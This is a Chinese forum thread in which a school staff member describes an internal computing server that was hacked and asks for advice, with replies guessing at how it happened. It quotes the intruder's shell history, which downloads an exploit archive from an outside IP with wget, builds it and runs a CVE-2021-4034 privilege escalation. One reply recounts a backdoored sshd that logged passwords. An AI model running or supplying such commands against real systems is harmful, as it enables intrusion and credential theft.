- 主题:服务器又被黑了。。。
一个老师说登不上了,我试了下果然登不上了
接上显示屏和键盘也没反应,只能强制关机然后重启了
进去后看了下账户,发现多了一个system账户,看日期像是13号创建的
作业管理系统也给搞坏了
现在不知道还有没有其他隐藏的东西
接下来该咋办
关机的时候还出现这样的提示:
PolicyKit daemon disconnected from the bus.
We are no longer a registered authentication agent.
--
修改:l234567890 FROM 218.28.195.*
FROM 218.28.195.*
搞高性能计算的服务器,系统基本上不动,好几年前的了
不过是内网,想着会安全些
【 在 dajun 的大作中提到: 】
: 现在的系统没有十年二十年前那么脆弱了,
: 能搞成这样自尽算了
: 发自「今日水木 on SunOS 5.6」
: ...................
--
FROM 1.192.37.*
我们内部的话不清楚,应该没这个水平吧
【 在 JulyClyde 的大作中提到: 】
: 被内部人黑了?
--
FROM 1.192.37.*
校园网里
大可能是校园网里某台变成肉鸡了
【 在 JulyClyde 的大作中提到: 】
: 如果这机器是纯内网,还被黑了
: 那要么是自己人,要么就是另外还有一台被黑了作为跳板
--
FROM 1.192.37.*
如果服务器有漏洞,是不是不用key也能攻破?
【 在 adoal 的大作中提到: 】
:
: 前些天刚帮一个搞科研的团队看过他们做计算的GPU服务器,
: 还好放数据的RAID卷里数据都正常,于是果断重装了。
: ...................
--来自微微水木3.5.14
--
FROM 106.34.155.*
黑客新建了一个账户,从里面的history文件里看到了黑客的操作
sud osu
sudo su
sudo su
ls
cd
ls
sud osu
sudo su
ls
lswget 92.118.39.35/explcentos.zip
wget 92.118.39.35/explcentos.zip
unzip explcentos.zip
make
./cve-2021-4034
su system
【 在 creek 的大作中提到: 】
: 理论上有可能,实际上对肉鸡一般都是掠夺式开发。
--
FROM 218.28.195.*
厉害
【 在 smo 的大作中提到: 】
: 几年前我们的集群服务器被黑,被装了带后门的sshd,把用户登录密码存放到/usr/inc
: lude/netda.h中......
:
: ...................
--来自微微水木3.5.14
--
FROM 1.192.37.*